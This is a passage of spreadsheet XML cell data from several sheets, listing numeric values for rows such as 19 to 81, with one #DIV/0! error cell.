          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>110.24</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>236.68</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3304.28600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>1347.34</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>3e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000344</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25321463897132e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.09883720930233e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>3e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730344</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>71.4852910979229</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857945779</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2e-11</v>
          </cell>
          <cell r="S76">
            <v>3.32e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>2.77777777777778e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10484668644906e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>1.38888888888889e-11</v>
          </cell>
          <cell r="V77">
            <v>62.5595944609313</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>9.24972222222223</v>
          </cell>
          <cell r="R79">
            <v>38.8327777777778</v>
          </cell>
          <cell r="S79">
            <v>3676.39166666667</v>
          </cell>
          <cell r="T79">
            <v>38.5405092592593</v>
          </cell>
          <cell r="U79">
            <v>53.9344135802469</v>
          </cell>
          <cell r="V79">
            <v>45.4548920211012</v>
          </cell>
          <cell r="W79">
            <v>113.084477011322</v>
          </cell>
          <cell r="X79">
            <v>105.27189230175</v>
          </cell>
          <cell r="Y79">
            <v>102.291875865602</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>23.9997222222222</v>
          </cell>
          <cell r="R80">
            <v>39.9997222222222</v>
          </cell>
          <cell r="S80">
            <v>2644.85555555556</v>
          </cell>
          <cell r="T80">
            <v>99.9988425925926</v>
          </cell>
          <cell r="U80">
            <v>55.5551697530864</v>
          </cell>
          <cell r="V80">
            <v>32.7009836245741</v>
          </cell>
          <cell r="W80">
            <v>74.4591951295732</v>
          </cell>
          <cell r="X80">
            <v>78.1255425384898</v>
          </cell>
          <cell r="Y80">
            <v>79.1124489050021</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>9.74972222222222</v>
          </cell>
          <cell r="R81">
            <v>29.4994444444444</v>
          </cell>
          <cell r="S81">
            <v>2925.26277777778</v>
          </cell>
          <cell r="T81">
            <v>40.6238425925926</v>
          </cell>
          <cell r="U81">
            <v>40.971450617284</v>
          </cell>
          <cell r="V81">
            <v>36.1679374107045</v>
          </cell>
          <cell r="W81">
            <v>279.70027636115</v>
          </cell>
          <cell r="X81">
            <v>276.242490442381</v>
          </cell>
          <cell r="Y81">
            <v>275.686343847932</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="4">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8227.459</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>82785.5630000503</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>7119</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4624.003</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>48843.8379999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>36.88</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6430.39</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>845</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>549</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12710.41</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>4586</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3269.853</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>21553.316</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>480</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>253</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4549.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>312.35</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>299.2</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3317.43600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>2387.719</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>581.555</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>4e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000345</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25295857988166e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.10144927536232e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>4e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730345</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>71.2737961661736</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.29985790439</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>3e-11</v>
          </cell>
          <cell r="S76">
            <v>3.33e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.125e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10502958579882e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>1.04166666666667e-11</v>
          </cell>
          <cell r="V77">
            <v>62.3745069033545</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>16.1663888888889</v>
          </cell>
          <cell r="R79">
            <v>54.9991666666667</v>
          </cell>
          <cell r="S79">
            <v>3692.55805555556</v>
          </cell>
          <cell r="T79">
            <v>67.3599537037037</v>
          </cell>
          <cell r="U79">
            <v>57.2907986111111</v>
          </cell>
          <cell r="V79">
            <v>45.5196998959018</v>
          </cell>
          <cell r="W79">
            <v>104.414165191842</v>
          </cell>
          <cell r="X79">
            <v>105.019773026864</v>
          </cell>
          <cell r="Y79">
            <v>102.301167460769</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>9.49972222222222</v>
          </cell>
          <cell r="R80">
            <v>49.4994444444444</v>
          </cell>
          <cell r="S80">
            <v>2654.35527777778</v>
          </cell>
          <cell r="T80">
            <v>39.5821759259259</v>
          </cell>
          <cell r="U80">
            <v>51.5619212962963</v>
          </cell>
          <cell r="V80">
            <v>32.7213421816787</v>
          </cell>
          <cell r="W80">
            <v>88.9499692973479</v>
          </cell>
          <cell r="X80">
            <v>80.2029203470297</v>
          </cell>
          <cell r="Y80">
            <v>79.1476565924828</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>16.5</v>
          </cell>
          <cell r="R81">
            <v>45.9994444444444</v>
          </cell>
          <cell r="S81">
            <v>2941.76277777778</v>
          </cell>
          <cell r="T81">
            <v>68.75</v>
          </cell>
          <cell r="U81">
            <v>47.916087962963</v>
          </cell>
          <cell r="V81">
            <v>36.2643340455841</v>
          </cell>
          <cell r="W81">
            <v>277.939393939394</v>
          </cell>
          <cell r="X81">
            <v>276.851169700117</v>
          </cell>
          <cell r="Y81">
            <v>275.698980939811</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="5">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6853.227</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>75932.3360000503</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>8301</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5301.241</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>51843.5969999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>249.27</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6181.12</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>738</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>357</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>13091.41</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>6592</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3725.971</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>24419.345</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>971</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>399</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>5121.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>633.33</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>353</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3597.76600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>644.227</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>5e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000346</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25270403146509e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.10404624277457e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>5e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730346</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>71.0635489921337</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857863001</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>4e-11</v>
          </cell>
          <cell r="S76">
            <v>3.34e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.33333333333333e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10521140609636e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>8.33333333333333e-12</v>
          </cell>
          <cell r="V77">
            <v>62.1905113077694</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>16.7</v>
          </cell>
          <cell r="R79">
            <v>71.6991666666667</v>
          </cell>
          <cell r="S79">
            <v>3709.25805555556</v>
          </cell>
          <cell r="T79">
            <v>69.5833333333333</v>
          </cell>
          <cell r="U79">
            <v>59.7493055555556</v>
          </cell>
          <cell r="V79">
            <v>45.5906840653338</v>
          </cell>
          <cell r="W79">
            <v>83.6526946107784</v>
          </cell>
          <cell r="X79">
            <v>100.043003754111</v>
          </cell>
          <cell r="Y79">
            <v>102.217207409478</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>8</v>
          </cell>
          <cell r="R80">
            <v>57.4994444444444</v>
          </cell>
          <cell r="S80">
            <v>2662.35527777778</v>
          </cell>
          <cell r="T80">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U80">
            <v>47.9162037037037</v>
          </cell>
          <cell r="V80">
            <v>32.7231474653119</v>
          </cell>
          <cell r="W80">
            <v>92.25</v>
          </cell>
          <cell r="X80">
            <v>81.8790519715166</v>
          </cell>
          <cell r="Y80">
            <v>79.1870272760783</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>21.3</v>
          </cell>
          <cell r="R81">
            <v>67.2994444444444</v>
          </cell>
          <cell r="S81">
            <v>2963.06277777778</v>
          </cell>
          <cell r="T81">
            <v>88.75</v>
          </cell>
          <cell r="U81">
            <v>56.0828703703704</v>
          </cell>
          <cell r="V81">
            <v>36.4191590189009</v>
          </cell>
          <cell r="W81">
            <v>289.483568075117</v>
          </cell>
          <cell r="X81">
            <v>280.849272323529</v>
          </cell>
          <cell r="Y81">
            <v>275.798071552465</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="6">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4808.761</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>71123.5750000503</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>5486.81</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4405.73</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>52924.6769999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>81.29</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6099.83</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>930.63</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12160.78</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>5333</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2394.75</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>27357.595</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>402</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4719.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>153.81</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>153.81</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>226</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3371.76600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>646.761</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>6e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000347</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25245098039216e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.10662824207493e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>6e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730347</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>70.8545385661765</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857821612</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>5e-11</v>
          </cell>
          <cell r="S76">
            <v>3.35e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.47222222222222e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10539215686275e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>6.94444444444444e-12</v>
          </cell>
          <cell r="V77">
            <v>62.0075980392172</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>9.75</v>
          </cell>
          <cell r="R79">
            <v>81.4491666666667</v>
          </cell>
          <cell r="S79">
            <v>3719.00805555556</v>
          </cell>
          <cell r="T79">
            <v>40.625</v>
          </cell>
          <cell r="U79">
            <v>56.5619212962963</v>
          </cell>
          <cell r="V79">
            <v>45.5760791122004</v>
          </cell>
          <cell r="W79">
            <v>94.4615384615384</v>
          </cell>
          <cell r="X79">
            <v>99.3748657137888</v>
          </cell>
          <cell r="Y79">
            <v>102.196874629578</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>57.4994444444444</v>
          </cell>
          <cell r="S80">
            <v>2662.35527777778</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>39.9301697530864</v>
          </cell>
          <cell r="V80">
            <v>32.6269029139434</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>81.8790519715166</v>
          </cell>
          <cell r="Y80">
            <v>79.1870272760783</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>15.1663888888889</v>
          </cell>
          <cell r="R81">
            <v>82.4658333333333</v>
          </cell>
          <cell r="S81">
            <v>2978.22916666667</v>
          </cell>
          <cell r="T81">
            <v>63.1932870370371</v>
          </cell>
          <cell r="U81">
            <v>57.2679398148148</v>
          </cell>
          <cell r="V81">
            <v>36.4979064542484</v>
          </cell>
          <cell r="W81">
            <v>301.047931280793</v>
          </cell>
          <cell r="X81">
            <v>284.564031568629</v>
          </cell>
          <cell r="Y81">
            <v>275.926654401735</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="7">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6117.06</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>65006.5150000503</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4741</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4811.609</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>52700.2579999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>1159</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>283.43</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6975.4</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>633</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>606</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12187.78</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2949</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3079.179</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>27227.416</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>231</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4488.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>199.2</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3172.56600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>2325.06</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>7e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000348</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25219941348974e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.10919540229885e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>7e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730348</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>70.6467540078201</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857780224</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>6e-11</v>
          </cell>
          <cell r="S76">
            <v>3.36e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.57142857142857e-11</v>
          </cell>
